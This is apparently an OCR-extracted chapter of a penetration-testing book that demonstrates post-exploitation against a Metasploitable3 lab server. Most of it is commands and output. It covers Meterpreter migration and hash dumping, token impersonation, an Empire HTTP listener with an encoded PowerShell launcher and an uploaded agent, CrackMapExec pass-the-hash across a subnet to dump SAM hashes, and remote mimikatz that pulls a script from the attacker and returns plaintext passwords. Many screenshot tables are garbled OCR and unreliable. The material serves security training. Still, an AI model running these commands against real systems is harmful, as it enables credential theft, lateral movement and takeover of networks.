In the following screenshots, we have successfully exploited a Windows 2008 R2 (a classic attack that is frequently used to validate more complex aspects of meterpreter). The initial step is to conduct an immediate reconnaissance of the network and the compromised system.

The initial Meterpreter shell is fragile and vulnerable to failure over an extended period of time. Therefore, once a system has been exploited, we need to migrate the shell and bind it with a more stable process. This also makes detecting the exploit more difficult. At the Meterpreter prompt, enter ps to obtain a list of running processes, as shown in the following screenshot:

neterpreter > ps

Process List

| PID | PPID | Nane | Arch | Session | User | Path |
|--------|---------|----------------------|-------------|---------|------------------------------|---------------------|
| 3000 | | | 33350 | | | |
| 0 | 0 | [Systen Process] | | | | |
| - | I | System | 264 |] | | |
| 252 | Ą | 5NS5.eXe | 764 | 1 | NT AUTHORITY\SYSTEM | \SystemBoot\System3 |
| 328 | 308 | CSISS.eXe | 164 | 1 | NT AUTHORITY\SYSTEM | C:\Windows\system32 |
| 348 | 32B | conhost.exe | <u>164</u> |] | WT AUTHORITY\LOCAL SERVICE | C:\Windows\system32 |
| 380 | 308 | vininit.exe | 16 4 | 1 | NT AUTHORITY\SYSTEM | C:\Windows\system32 |
| 388 | 372 | CSISS.eXe | 164 | 1 | NT AUTHORITY\SYSTEM | C:\Windows\system32 |
| 420 | 372 | vinlogon.exe | <u>7</u> 64 | 1 | NY AUTHORITY\SYSTEM | C:\Windows\system32 |
| 472 | 380 | services.exe | 164 | 1 | NT AUTHORITY\SYSTEM | C:\Windows\system32 |
| 500 | 380 | lsass.exe | 264 | 1 | NT AUTHORITY\SYSTEM | C:\Windows\system32 |
| 508 | 380 | lsm.exe | <u>164</u> | 1 | NT AUTHORITY\SYSTEM | C:\Windows\system32 |
| 584 | 1960 | dcrotatelogs.exe | <u>786</u> | 1 | NT AUTHORITY\LOCAL SERVICE | C:\NanageEngine\Des |
| rver\; | ipache\ | bin\dcrotatelogs.exe | | | | |
| 612 | 472 | sychost.exe | <u>764</u> | | NT AUTHORITY\SYSTEM | |
| 628 | 472 | sychost.exe | 164 | J | NT AUTHORITY\LOCAL SERVICE | |
| 676 | 472 | VBoxService.exe | <u>764</u> |] | NY AUTHORITY\SYSTEM | C:\Windows\System32 |
| Xe | | | | | | |
| 740 | 472 | sychost.exe | I6 4 |] | NT AUTHORITY\NETWORK SERVICE | |
| 828 | 472 | svchost.exe | 16 4 | - | WI AUTHORITY/LOCAL SERVICE | |

The ps command also returns the full path name for each process. This was omitted from the previous screenshot. The ps list identifies that c:\windows\explorer.exe is running. In this particular case, it is identified with the process ID of 604, as shown in the following screenshot. As this is a generally stable application, we will migrate the shell to that process:

| met | erpreter > | migra | ate 40 | 028 | |
|-----|------------|-------|--------|-----|-------------|
| [*] | Migrating | from | 1104 | to | 4028 |
| [*] | Migration | compl | Leted | suc | ccessfully. |

One of the first parameters to identify is: are we on a virtual machine? With the meterpreter session open between the compromised system and the attacker, the run post exploit module checkvm command is issued, as shown in the following screenshot. The returned data indicates that This is a Sun VirtualBox Virtual Machine:



Some of the most important post-exploitation modules that are available through Meterpreter are described in the following table:

| Command | Description |
|--|---|
| run post/windows/manage/inject_host | Allows the attacker to add entries to the Windows HOSTS file. This can divert traffic to a different site (a fake site), which will download additional tools or ensure that the antivirus software cannot connect to the internet or a local server to obtain signature updates. |
| run | Dumps all of the cached information that can |

| post/windows/gather/cachedump | be further utilized to exfiltrate data. |
|---------------------------------------|---|
| run use post/windows/manage/killav | Disables most of the antivirus services running on the compromised system. This script is frequently out of date, and success should be manually verified. |
| run winenum | Performs a command-line and WMIC characterization of the exploited system. It dumps the important keys from the registry and LM hashes. |
| run scraper | Gathers comprehensive information that has not been gathered by other scripts, such as the entire Windows registry. |
| run upload and run download | Allows the attacker to upload and download files onto the target system. |

Let's look at an example. Here, we will run winenum on the compromised system, which dumps all of the important registry keys and LM hashes for lateral movement and privilege escalation. This can be accomplished by running run winenum on the Meterpreter shell, as shown in the following screenshot:

```
meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 192.168.0.115:445...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/ME
txt
[*] Output of each individual command is saved to /root/.msf4/lo
[*] Checking if METASPLOITABLE3 is a Virtual Machine ......
        UAC is Disabled
[*] Running Command List ...
        running command arp -a
       running command ipconfig /displaydns
       running command route print
       running command netstat -nao
       running command netstat -vb
        running command net view
       running command netstat -ns
       running command cmd.exe /c set
       running command ipconfig /all
       running command net accounts
       running command net group administrators
       running command netsh firewall show config
        running command net user
       running command net localgroup administrators
       running command tasklist /svc
       running command net session
       running command net group
        running command net share
       running command net view /domain
       running command net localgroup
       running command cscript /nologo winrm get winrm/config
       running command gpresult /SCOPE COMPUTER /Z
```

You will be able to see the confirmation All tokens have been processed, as shown in the following screenshot:

| | Running WMIC Commands |
|--------------|---|
| [±] | running command whic useraccount list |
| [±] | running command whic group list |
| | running command whic service list brief |
| [t] | running command whic share get name, path |
| [t] | running command wmic nteventlog get path,filename,writeable |
| the second | running command wmic volume list brief |
| T | running command wmic netlogin get name,lastlogon,badpasswordcount |
| t | running command whic netuse get name, username, connectiontype, localname |
| Įİ. | running command whic netclient list brief |
| | running command whic logicaldisk get description,filesystem,name,size |
| the second | running command wmic startup list full |
| t | running command whic rdtoggle list |
| [t] | running command whic product get name, version |
| (***) | running command wmic qfe |
| | Extracting software list from registry |
| | Dumping password hashes |
| | Hashes Dumped |
| [t] | Getting Tokens |
| | All tokens have been processed |
| [t] | Done! |

One of the other things attackers can do is impersonate the session tokens by using Meterpreter and utilizing the incognito module. Initially, it was a standalone module that was created to impersonate a user by using the session tokens. These are similar to web session cookies in that they can identify the user without having to ask for their username and password every time. Similarly, the same situation applies for the computer and network.

Attackers can run incognito in Meterpreter by running use incognito in the Meterpreter shell, as shown in the following screenshot:

| meterpreter > use incognito |
|--|
| Loading extension incognitoSuccess. |
| <pre>meterpreter > list_tokens -u</pre> |
| Delegation Tokens Available |
| METASPLOITABLE3\sshd server |
| METASPLOITABLE3\vagrant |
| NT AUTHORITY\LOCAL SERVICE |
| NT AUTHORITY\NETWORK SERVICE |
| NT AUTHORITY\SYSTEM |
| Impersonation Tokens Available |
| NT AUTHORITY\ANONYMOUS LOGON |

For example, if the Meterpreter shell is pawned by a local user, by impersonating the user token as system user NT Authority, a normal user can enjoy the privilege of a system user.

To run the impersonation, attackers can run impersonate_token from the Meterpreter shell, as shown in the following screenshot:



The Empire project

The Empire tool is currently the most powerful post exploitation tool, and it's used by penetration testers around the globe to perform a variety of different attacks in penetration tests to demonstrate system vulnerabilities. This tool runs PowerShell agents that, by nature, are persistent. It also utilizes other important tools, such as mimikatz. In this section, we will look closer at how to use PowerShell's Empire tool to escalate privileges on victim systems without having to plant any backdoors or using any invasive techniques.

Penetration testers can clone the repository by using git:

```
git clone https://github.com/EmpireProject/Empire
cd Empire/
cd setup
./install.sh
```

Once the installation is complete, we should be able to see a prompt where we can enter the password for server negotiation. The same can be used to reset the databases:

One important file that you will need to watch while using the Empire tool is reset.sh. This file is used to completely wipe the database and start a new one.

Once the application has been installed, the next step is to run ./empire. The attackers should be able to see the Empire tool, as shown in the following screenshot:



The current Empire tool has around 285 built-in modules. The following table provides a list of commands that are crucial when using the Empire tool, since it is similar to Metasploit and Veil-Pillage; however, these commands are used in their own particular way:

| Command | Description |
|---------|--|
| agents | Access a list of agents that are connected |
| creds | Add/display credentials to/from the database |
| exit | Exit Empire |
| | |

| help | Display the help menu |
|--------------|--|
| interact | Interact with a particular agent |
| list | List active agents or listeners |
| listeners | Interact with active listeners |
| load | Loads Empire modules from a nonstandard folder |
| reload | Reload one (or all) Empire modules |
| reset | Reset a global option (for example, IP whitelists) |
| searchmodule | Search Empire module names/descriptions |
| set | Set a global option (for example, IP whitelists) |
| show | Show a global option (for example, IP whitelists) |
| usemodule | Use an Empire module |
| usestager | Use an Empire stager |

There are four important roles that the Empire tool consists of:

- **Listeners**: This is similar to the Meterpreter listener, waiting for the connection from the compromised systems. Listener management provides the interface to create listeners locally by different types—dbx, http, http_com, http_foreign, http_hop, and meterpreter. In this chapter, we will explore http.
- **Stagers**: Stagers provide a list of modules for OS X, Windows, and other operating systems. These are DLLs, macros, one-liners, and others that can be utilized using an external device to perform more informed social engineering and physical console attacks.
- **Agents**: The agents are the zombies that connect to the listeners. All of the agents can be accessed by running the agent command, which will take us straight to the agents menu.
- **Logging and downloads**: This section can only be accessed when a successful agent is connected to the listeners. Similar to Meterpreter, the Empire tool allows us to run mimikatz on the local machine via PowerShell and export the details to perform more focused attacks.

The first thing we must do is set up the local listeners. The *listeners* command will help us jump to the listener menu. If there are any active listeners, then those will be displayed. Use the *listener* http command to create a listener, as shown in the following screenshot:

```
(Empire) > listeners
(Empire: listeners) > uselistener
dbx
             http com
                            http hop.
                                                        redirector
                                          neterpreter
http
              http foreign http mapi
                                          onedrive
(Empire: listemers) > uselistemer http
(Empire: listeners/http) > info
   Name: HTTP[S]
Category: client server
Authors:
  @harmj0y
Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.
HTTP[S] Options:
                    Required
                                Value
                                                                  Description
  Nane
  ____
                                _____
  SlackToken
                                                                  Your SlackBot API tok
                    False
stance.
  ProxyCreds
                    False
                                default.
                                                                  Proxy credentials ([d
 request (default, none, or other).
                                                                  Date for the listener
  KillDate
                    False
                                                                 Name for the listener
  Nane
                    True
                                http
```

Once the listeners have been selected, by default, port 80 is set. If you are running an HTTP service, you can change the port number by typing set Port portnumber. Always remember that all of the commands in the Empire tool are case-sensitive. You can utilize the tab feature, which will autocorrect the command and provide options.

The next step is to execute and launch, as shown in the following screenshot. The launcher allows us to select a language, either Python or PowerShell:

```
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > execute
[*] Starting listener 'http'
[+] Listener successfully started!
(Empire: listeners/http) > launcher powershell
```

```
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > execute
[*] Starting listener 'http'
  Serving Flask app "http" (lazy loading)
  Environment: production
  Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBpAG8AbgBUAEEAYg
AgACOAZwB1ACAAMwApAHsAJABHAFAARgA9AFsAcgBFAEYAXQAuAEEAUwBTAEUATQBCAEwAWQAu
AG4AYQBnAGUAbQB1AG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALqBVAHQAaQBsAHMAJwApAC
UAZABHAHIAbwBIAHAAUABwAGwAaQBJAHkAUwBIAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcA
SQBGACqAJABHAFAARqApAHsAJABHAFAAQwA9ACQARwBQAEYALqBHACUAVABWAGEATABVAGUAKA
ByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBb.
AGCAaQBuAGCAJwBdAFSAJwBFAG4AYQB1AGwAZQBTAGMAcqBpAHAAdABCACCAKwAnAGwAbwBjAG
CAUWBJAHIAaQBWAHQAQQANACSAJWBSAG8AYWBYAEWAbWBNAGCAaQBUAGCAJWBdAFSAJWBFAG4A
bwBjAGEAdABpAG8AbqBMAG8AZwBnAGkAbqBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATA
BJAGMAVABJAG8ATqBBAFIAeOBbAHMAdABSAGkAbqBHACwAUwBZAFMAdABFAG0ALqBPAEIASqBF
AGQAZAAoACcARQBuAGEAYqBsAGUAUwBjAHIAaQBwAHQAQqAnACsAJwBsAG8AYwBrAEwAbwBnAG
```

To get the systems to become their agents, attackers can utilize their existing Meterpreter session to run the PowerShell, along with the payload generated by the Empire tool, as shown in the following screenshot:

```
meterpreter > upload /root/chap11/agent.psl c:\windows\temp\
> Interrupt: use the 'exit' command to quit
meterpreter > upload /root/chap11/agent.psl c:/windows/temp/
[*] uploading : /root/chap11/agent.psl -> c:/windows/temp/\agent.psl
meterpreter > shell
Process 5376 created.
Channel 6 created.
Microsoft windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\normaluser>powershell "c:\windows\temp\agent.psl"
powershell "c:\windows\temp\agent.psl"
#< CLIXML
^2
Background channel 6? [y/N] y
```

Once the payload is run on the remote system, our Empire tool interface must show the following:

To interact with an agent, you must type agents to list all the agents that are connected to you, as well as interact "name of the agent". You can run the system level command from our HTTPlistener to the agent, as shown in the following screenshot:

```
(Empire: agents) > interact CPGFL3XS
(Empire: CPGFL3XS) > sysinfo
[*] Tasked CPGFL3XS to run TASK SYSINFO
[*] Agent CPGFL3XS tasked with task ID 1
(Empire: CPGFL3XS) > sysinfo: 0|http://192.168.0.24:80|METASE
dows Server 2008 R2 Standard |True|powershell|936|powershell|
[*] Agent CPGFL3XS returned results.
Listener:
                 http://192.168.0.24:80
Internal IP:
               192.168.0.115
Username:
                 METASPLOITABLE3\vagrant
Hostname:
               METASPLOITABLE3
                 Microsoft Windows Server 2008 R2 Standard
OS:
High Integrity:
                 1
Process Name:
                 powershell
Process ID:
                 936
Language:
                 powershell
Language Version: 5
```
CrackMapExec

CrackMapExec (**CME**) is another post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of *"living off the land"*: abusing built-in Active Directory features/protocols to achieve its functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.

CME makes heavy use of the Impacket library and PowerSploit for working with network protocols and performing a variety of post-exploitation techniques. CME can be installed just by issuing the apt-get install crackmapexec command from the Terminal; this will install version 3.1.15. After successful installation of CME, you should be able to list all of the modules in the tool by running crackmapexec -L, as shown in the following screenshot:

| root(kali:- cracknape | zec -L |
|------------------------|---|
| [] empire exec | Uses Empire's RESTful RFI to generate a launcher for the specified listener and executes it |
| 🚺 shellinject | Downloads the specified raw shellcode and injects it into memory using PowerSploit's Invoke-Shell |
| code.psl script | |
| (†) rundli 20 exec | Executes a command using rund1132 and Windows's native javascript interpreter |
| [f] ninikittenz | Executes Winikittenz |
| 🕅 con exec | Executes a command using a COW scriptlet to bypass whitelisting |
| (†) enun chrone | Uses Powersploit's Invoke-Minikatz.ps1 script to decrypt saved Chrome passwords |
| (f) takens | Enumerates available tokens using Powersploit's Invoke-TokenManipulation |
| [f] niniaiz | Executes PowerSploit's Invoke-Wimikatz.ps1 script |
| [1] povezviek | Wrapper for PowerView's functions |
| (†) peirject | Downloads the specified DLL/EXE and injects it into memory using PowerSploit's Invoke-ReflectiveP |
| Elnjection.psl script | |
| [f] tokenrider | Allows for automatic token enumeration, impersonation and mass lateral spread using privileges in |
| stead of dupped creden | tials |
| [*] metinject | Downloads the Neterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode. |
| psl script | |
| [*] eventwr bypass | Executes a command using the eventwr.exe fileless UAC bypass |
| - Testers me | av face issues with crackmanexec during or after installation. This happens due to |

Testers may face issues with crackmapexec during or after installation. This happens due to the API key changing from Empire's. In this case, you may directly clone the tool from GitHub by running git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec from the Terminal.

This tool works for the objective that has been set during a red team or pent test. The CME can be briefly divided into three parts: protocols, modules, and databases:

TIP

• **Protocols**: CME supports SMB, MSSQL, HTTP, WINRM, and SSH. These

are protocols that are commonly used in most organizations.

• **Modules**: The following table provides a list of modules that are currently available in CME. However, the modules aren't limited to this list; testers can also utilize third-party plugins or write their own PowerShell script and invoke them using CME:

| Module Name | Description | |
|----------------|--|--|
| empire_exec | This will launch the Empire RESTful API and generate a launcher for the specific listener before executing on the target. | |
| shellinject | Utilizes PowerSploit's Invoke-Shellcode.ps1 script to inject the shellcode into memory and downloads the specified raw shell code. | |
| rundll32_exec | Executes a command using rundll32 and Windows's native JavaScript interpreter. | |
| mimikittenz | If mimikatz is being blocked, you can utilize mimikittenz. This module will enable the testers without having to download another payload. | |
| com_exec | Uses COM scriptlet to bypass application whitelisting. | |
| enum_chrome | Utilizes Powersploit's Invoke-Mimikatz.ps1 script to decrypt saved passwords in Google Chrome. | |

| tokens | Utilizes Powersploit's Invoke-TokenManipulation SCript to extract tokens. |
|-----------------|--|
| mimikatz | Utilizes PowerSploit's Invoke-Mimikatz.ps1 script to dump the passwords into plaintext. |
| powerview | This provides PowerView's functions and displays a view of the network. |
| peinject | This utilizes PowerSploit's Invoke-ReflectivePEInjection.ps1 script to inject the script into memory by downloading the specified DLL/EXE. |
| tokenrider | A very interesting payload that allows you to enumerate valid tokens and impersonate them. These are used in privilege escalation and lateral movement. This can be utilized by the attackers, since these tokens will not make use of any <code>lsass.exe</code> dumps. |
| metinject | Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 Script. |
| eventvwr_bypass | Executes a command using the eventvwr.exe fileless UAC bypass. |

• **Databases**: cmedb is the database that stores the host and its credential details, which are harvested after the exploitation. The following screenshot provides a sample of some details:

| root[kali cmedb > h | :∙‡ cmedib osts | | | | | | |
|------------------------|--------------------|----------|--------|-----------|----------|-----------|-----------|
| Eosts: | | | | | | | |
| HostID | Admins | IP | | Eostname | | Domain | OS |
| | | | | | | | |
| 1 | 2 Cred(s) | 192.168. | 0.115 | METASPLOI | TABLE3 | MASTERING | Wind |
| cmeáb > c | reds | | | | | | |
| Credentia | ls: | | | | | | |
| CredID | Admin On | CredType | Domair | 1 | UserName | Password | i |
| ****** | ******* | | | 6 | ******* | ****** | |
| 1 | 1 Host(s) | hash | local | | vagrant | aad3b43 | 5b51404ee |
| 1d913c245 | d35b50b | | | | | | |
| 2 | 1 Host(s) | hash | netasp | loitable3 | vagrant | aad3b43 | 5b51404ee |
| 1d913c245 | d35b50b | | 2.5 | | | | |

As an example, we will use the hashdump that we acquired from the compromised system to run the <code>ipconfig</code> command, as shown in the following code:

crackmapexec smb 192.168.0.115 -u vagrant -d local -H aad3b435b51404eeaad3b435b51404ee:e

The following screenshot proves the validity of the credentials by passing the hash is successful and <code>ipconfig</code> command being run on the target:

| notikali. | crackmapexec smb 192.168.0.115 -u wagramt -d metasploitable3 -H aad36435651404eeaad36435651404ee:e026c503339d |
|---------------|---|
| 51f71d913c245 | d35b50b -x ipconfig |
| DE | 192.168.0.115:445 METASPLOITABLE3 [*] Windows 6.1 Build 7601 (name:METASPLOITABLE3) (domain:MASTERING) |
| 22 | 192.168.0.115:445 METASPLOITABLE3 [+] metasploitable3\wagrant aad3b435b51404eeaad3b435b51404ee:e02bc503339d51 |
| f71d913c245d3 | Sb50b (Pm3d!) |
| DE | 192.168.0.115:445 METASPLOITNBLE3 [+] Executed command |
| | 192.168.0.115:445 METASPLOITABLES Windows IP Configuration |
| 0E | 192.168.0.115:445 METASPLOTTABLE3 |
| | 192.168.0.115:445 METASPLOITABLE3 |
| DE | 192.168.0.115:445 METASPLOITABLE3 Ethernet adapter Local Area Connection: |
| 02 | 192.168.0.115:445 METASPLOTTABLE3 |
| 02 | 192.168.0.115:445 METASPLOITABLE3 Connection-specific DNS Suffix . : |
| N. | 192.168.0.115:445 METASPLOITABLE3 Link-local IPv6 Address : fe80::40ab:8801:a334:774d811 |
| 002 | 192.168.0.115:445 METASPLOTTABLE3 IPv4 Address 192.168.0.115 |
| 02 | 192.168.0.115:445 METASPLOTTABLE3 Subnet Wask |
| 02 | 192.160.0.115:445 METASPLOTTABLE3 Default Gateway 192.160.0.1 |
| 22 | 192.168.0.115:445 METASPLOITABLE3 |
| DIE | 192.168.0.115:445 METASPLOITABLE3 Tunnel adapter isatap.(41830FAS-CAN5-46F2-AF70-9F71F8915955): |
| CE. | 192.168.0.115:445 METASPLOITABLE3 |
| 5 | 192.168.0.115:445 METASPLOITABLE3 Media State Media disconnected |
| | 192.168.0.115:445 METASPLOITRBLE3 Connection-specific INS Suffix: |
| | |

Horizontal escalation and lateral movement

In horizontal escalation, the attacker retains their existing credentials but uses them to act on a different user's account. For example, a user on compromised system A attacks a user on system B in an attempt to compromise them.

The horizontal move that attackers would utilize is from the compromised system. This is used to extract the hashes of common usernames such as ITsupport, LocalAdministrators, or known default user administrators to escalate the privileges horizontally on all the available systems that are connected to the same domain. For example, here, we will use CME to run the same password hashes across an IP range to dump all of the passwords on a hacker-controlled shared drive:

crackmapexec smb 192.168.0.0/24 -u administrator -d local -H aad3b435b51404eeaad3b435b51

The following screenshot provides the output of SAM dump being run on an entire IP ranges to extract SAM password hashes without planting any executables or backdoors:

| mont the state | reactionary and 147.16 | 0.0224 microsoft of local of antibilities of the state of | |
|--|--------------------------|--|------|
| | | | |
| 1000 | 101.160.0.115:445 Mitths | FOITABLES [*] Windows 4.1 Build 3401 (name METASULOITABLES) (thomain MASTSKING) | |
| Class . | 192.168.0.135:145 METAS | REGIVABLE: [+] logal/vegrest sat3bf3501100sesad3bf33b5340des-e03bc503339451r7id935c945d35b58b t | 20 |
| mindety | | | |
| 100000 | 192.568.0.115:445 MRTN | rectronics) [+] resping local mar hashes (uid rid) ishash athash) | |
| C MARK | 192.168.0 115:448 MREAM | 1017401451 Administrator 500: as(3043505140)asaad30435051404as a020c503339051671d913c245d35550b: | |
| 12 H | 192.168.0.115:445 METRA | PL01TABLE3 Genet: 501:aad3b435b51494eeaad3b435b51494ee:31d502e9d16ae931b13c59d7e0c089c9::: | |
| - C2010 | 199.160.0.115:445 METAS | FE01TABLE3 vsgrast: 1000: asd3b435b51404eeaad3b435b51404ee; e01bc503339d51f73d913c245d35b50b; : : : | |
| Contract in the second se | 191.160.0.115:445 MRTRA | FC019AHL83 mstd:1001:asd3b435b51404eeaad3b435b51404ee:31d6cfs0d16ee931b73c5587e0c009c0::: | |
| 100 | 192.188.0.115.445 Mercu | PLCTTANLE3_selid_server(1002)aad3b435b51454eeaad3b435b51404ee(860a14plC046c3059db455404ec27035);;; | |
| 2000 | 192.569.0.115.445 MICTAL | rterrantati lata_organa(1004;aadihd35655494eesaadib435661404ee;9ae6a#10os203621of9ofa6f31f13828);;; | |
| CONTRACT OF A | 191,168.0.115:441 HETAE | PL017ABLE1 Loks_skywalkar:1005:aad3b435b5140ieeaad3b435b51404ee-481e4158bde48956d250e5bac82505a | 11.1 |
| 1 | | | |
| C MARKE | 191.168.0.115:445 MREAD | (101740143 han_wolo:1005:aatt3b435b51404weaad3b435b51404we:33ed58c5369d05e7u15c25c53e3e5951:::: | |
| -CHE | 101,160.0.115:445 MREAL | ROTTAILED artoo_detoo:1107:aad3b435b51404eeaad3b435b51404ee:Eac6aadabb7afo416b3afead3b7577b4::: | |
| DO DE | 332.168.0.115.145 MCEAL | FLQ1TANLK3 a three gio (1908) and 3b425b51494oeaad3b435b61404ee (05d3eb40o4aa690173ba066c197397ee (1) | |
| COLUMN . | 392.569.0.1151445 MICTAL | PLCTPARTAR3 lien_beach1:1019:aad3b436b61404eeaad3b435b61404ee:4fb71d#14bie7aeee8bd7c2e5e55c959:::; | |
| CHHI I | 192,568.0.135:445 Merske | H.017481353 darth_vader:1019:sad3b435b51494wwad3b435b51404ws/b73a65185wrfE7arafbas8a086wwa3w9::: | |
| D | 132.163.0.115:445 MREAM | NOTABLET undkin_skywalkut:[U11:add3b435b55404eeaad3b435b51404ee.cr06583a7b17a0230e55cda283db34 | E. |
| 122 | | | |
| 10196 | 399.168.0.115:445 MRTM | H01TABLE3 jarjar_binks:1012:aad3b435b51404seaad3b435b51404se:ecidod52017e75aaf4a1930b0917c464: | |
| CONTRACT OF A | 195.169.0.115:445 Herrs | PL0199801263 Lando_salvissias(1013)aad9b435b51494eeaad3b435b51494ee(62709455699473d7db11ofb670045a5 | en r |
| F11 | | | |
| C140 | 191.168.0.115(445 META) | P5017481483 boba_fett:1014:sad3b435b51494eeaad3b435b51404ee:d60f9a6469da4feadaf163e91d200dc9:::: | |
| C 1 | 192.568.0 115-445 MERA | EGTTABLE3 jabbe_httl:1015 ead3b435b51404eeaad3b435b51404ee.53ec4eaa43d43565651312e7f28d93ce16 | |
| 10 M | 192.168.0.115:445 MBTAI | Rec11448143 greeds 1616 :aad3b435551404eeaad3b435551404ee :ce269:657d3e2f1522b44686549183d5 ::: | |
| 194 | 191.168.0.115:445 MRTRJ | 0501YA8143 ubewhansa:1017:aad3b435b5140beeaad3b435b51404ea:e7200536327ee731c7fe136af4575ed8:::: | |
| 1. Contraction of the second | 192.168.0.115:445 MRTRI | PL017ARLK3 ky1o_pen:1018 aad3b135b51404eeaad35b13b51404ee-74c0a3d306413d3240331e94ae18b001 ::: | |
| 1000 | 192.169.9-11CI 44E MREAD | PERTYANUKA NAONEE 1919 AADIM DONS DIGERAADIM DASI 404ee (Se7599767SHT11466So499507ShT0157)) | |

Most of the time, we have been successful in using the same local administrator's password hash to successfully log in to the domain's **SCCM** (**Microsoft System**

Center Configuration Manager) system. This manages software installation on all of the systems that are managed by any organization. It then performs the command and control from SCCM.

By running the following command, you can run Mimikatz on the desired target with captured username and password hashes:

|crackmapexec smb 192.168.0.115 -u vagrant -d local -H aad3b435b51404eeaad3b435b51404ee∶€

The following screenshot provides the output of mimikatz being run on our victim system to extract passwords in plaintext without uploading any executables or planting any backdoors:

| rootikali: | crackmapexec sab 192.168.0.115 -v | waqrant -d local -E aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c |
|-------------|-----------------------------------|---|
| 2456356506 | -V ninikatz | |
| CLE | 192.168.0.115:445 METASPLOTTABLE3 | [*] Windows 6.1 Build 7601 (name:METASPIOTTABLE3) (domain:MESTERING) |
| the | 192.168.0.115:445 METASPLOITABLE3 | [+] local/vagrant aad3b436b51404eeaad3b435b51404ee:e02bc503339d51f71d913c24 |
| 50356506 (8 | m3d!) | |
| KINERRAZ | 192.168.0.115:445 METASPLOTTRELES | [+] Executed payload |
| YOUTH T | | [*] Waiting on 1 host(s) |
| KIMERAN | 192.168.0.115 | <pre>[*] "GET /Invoke-Minikatz.ps1 HTTP/1.1" 200 -</pre> |
| VENERAL R | 192.168.0.115 | [*] "POST / HTTP/1.1" 200 - |
| KIMERANZ | 192.168.0.115 | [+] Found credentials in Wimikatz output (domain/username:password) |
| KINEKKYZ | 192.168.0.115 | MASTERINS METRSPLOITRELE35 : bodia05677609a0e610a281d5c7b8919 |
| KINIKATZ | 192.168.0.115 | NETRSPLOFTABLE3 wagrant:e02bc503339d51f71d913c245d35b50b |
| VINIKA M | 192.168.0.115 | NETASPLOITABLE3(sshd server:8d0a16cfc061c3359db455d00ec27035 |
| KINEKATZ | 192,168.0.115 | NETASPLOITABLE3(vagrant:vagrant |
| KONERARZ | 192.168.0.115 | NETRSPLOTTABLE3(sshd server:D(rj33))ng |
| VINIKA 72 | 192.168.0.115 | 172.28.128.3\chewbacca:rwaaaaawr5 |
| KINI KAR | 192.168.0.115 | [*] Saved Mimikatz's output to Mimikatz-192.168.0.115-2018-12-31 121708.log |
| II MEERYE | | |

In mature organizations, there may be a chance that this payload is blocked by endpoint protection or antivirus software, but that does not stop the hashdump if the user is a local administrator.

CME has excellent support so that you can pass the hash and invoke mimikatz directly from the module or invoke the Empire PowerShell to perform data exfiltration.

Veil-Pillage

Veil-Pillage is a module that was developed as part of the main Veil-Framework. This can be utilized by the attackers during post-exploitation. In this section, we will take a quick look at how Veil-Pillage is organized and the different types of modules that can be utilized to achieve our goal of penetration testing.

The following diagram describes the different sections of the Veil-Pillage framework:

Credentials Enumeration Impacket Management Payload_delivery Persistence Powersploit

Further details on all of the available modules in the Pillage framework are as follows:

- **Credentials**: Provides a list of modules that can be utilized to grab all of the credentials and a hashdump of a compromised system with a valid username and password
- **Enumeration**: This section provides a list of modules that are specifically used for enumerating a domain network and also provides a module to validate the credentials
- **Impacket**: Can be utilized to run different types of shell (SMB, PsExec)
- **Management**: Manages and escalates privileges, such as enabling the remote desktop, logging off, and checking for UAC, and so on
- **Payload_delivery**: A list of modules that can be utilized to deliver a payload in different varieties, such as EXE and PowerShell
- **Persistence**: Key modules are included in the persistence session, such as

adding local and domain users, finding sticky keys, and so on

• **PowerSploit**: This is the most important part of pillaging since this is where the modules are designed to perform remote code execution, data exfiltration, and run custom PowerShell exploits

Veil-Pillage can be directly cloned from GitHub by running git clone https://github.com/Veil-Framework/Veil-Pillage from the Terminal.

Once the repository has been cloned, use cd Veil-Pillage/ and update the package for the latest module updates by running ./update.py. git clone satisfies the older version of impacket, but it may not run Veil-Pillage so it is recommended that you run pip install impacket==0.9.13. Once the application has been downloaded, you can run /Veil-Pillage.py from the location of the clone, as shown in the following screenshot:

```
Veil-Pillage: post-explotation framework | [Version]: 1.1.2
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
Main Menu
       61 modules loaded
Available commands:
                       use a specific module
       use
                       list available [modules, targets, creds]
       list
                       set [targets, creds]
       set
                       set global module option
       seta
                       reset [targets, creds]
       reset
                       interact with the MSF database
       db
                       run a module cleanup script
       cleanup
                       exit Veil-Pillage
       exit
```



Testers who face error messages with respect to modules not being found such as "No module named modules.*" must ensure that Veil-evasion is first installed on Kali and also ensure that they have installed impacket v0.9.13.

Compromising domain trusts and shares

In this section, we will discuss the domain hierarchies that can be manipulated so that we can take advantage of the features that are being implemented on Active Directory.

We will utilize the Empire tool to harvest all of the domain-level information and trust relationships between the systems. To understand the current situation of the system that is being compromised, attackers can now perform different types of queries by using the Empire tool. The following table provides a list of the most effective modules that are typically used during a RTE/pentesting activity:

| Module Name | Description |
|---|---|
| situational_awareness/network/sharefinder | This modules provides a list of network file shares on the given network. |
| situational_awareness/network/arpscan | Testers can perform an arpscan to the reachable IP v4 range. |
| situational_awareness/network/reverse_dns | This module provides the reverse IP lookup and finds the DNS hostname. |
| | Similar to nmap, you can use |

| situational_awareness/network/portscan | this module to perform host scans, but this is not stealthy. |
|--|---|
| situational_awareness/network/netview | This module helps the attackers to enumerate shares, logged on users, and sessions on a given domain. |
